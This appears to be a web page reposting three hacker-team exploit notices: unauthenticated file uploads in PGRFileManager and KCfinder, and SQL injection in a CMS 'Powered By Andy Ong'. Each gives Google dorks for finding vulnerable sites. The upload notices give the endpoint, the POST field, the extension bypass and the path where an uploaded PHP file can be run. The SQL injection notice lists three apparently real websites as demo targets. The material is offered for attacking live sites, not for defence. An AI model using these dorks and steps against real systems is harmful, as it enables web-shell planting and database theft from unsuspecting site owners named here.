Heboh WOW

///////////////////////////////////////////////// # Exploit Title: PGRFileManager arbitraty file upload # Google Dork:      inurl:/pgrfilemanager/ index of # Date: - # Exploit Author: - # Team: - # Vendor Homepage: http://pgrfilemanager.sourceforge.net/ # Tested on: Mozilla firefox 40.0 Windows 7 ultimate x64 ************************************************ {+} search the dork in google search engine or other {+} open target {+} exploit : localhost/path/pgrfilemanager/php/upload.php {+} vuln ? blank {+} open CSRF HERE        post file = Filedata        upload file ext php, html , jpg or other ( bypass ext ) {+} Access file : localhost/path/pgrfilemanager/userfiles/namefile.php *********************************************** thanks to Zi-slow \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

///////////////////////////////////////////////// # Exploit Title: Fresh exploit KCfinder # Google Dork:       inurl:/assets/file_upload/admin/       inurl:/assets/file_upload/hacker/ # Date: 28 / 08 / 2018 # Exploit Author: SpecimenT # Vendor Homepage: https://kcfinder.sunhater.com # Team: Dark Pinus Squad # Tested on: Mozilla firefox 40.0 Windows 7 ultimate x64 ************************************************ {+} search the dork in google search engine or other {+} open target {+} exploit : localhost/assets/tools/kcfinder/upload.php {+} vuln ? blank {+} open CSRF HERE        post file = Filedata        upload file ext php5 or other ( bypass ext ) {+} Access file : /assets/file_upload/hacker/files/file.php5 *********************************************** thanks to all Friends \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\

///////////////////////////////////////////////// # Exploit Title: SQLI in CMS Powered By Andy Ong # Google Dork: intext:"Powered By Andy Ong" # Date: 17 / 08 / 2018 # Exploit Author: CYBERSCRY # Team: LAmongan Xploiter # Tested on: Mozilla firefox 40.0 Windows 10 x64 ************************************************ {+} search the dork in google search engine or other {+} open target {+} exploit with SQL injection ************************************************ {+} Demo site : {+} http://mypets.co.id/detailnews.php?id=34 {+} www.indonesian-coffee.com/page.php?content=mediakit {+} https://www.kingledindonesia.com/page.php?content=page ************************************************ thanks to all member LAmongan Xploiter \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\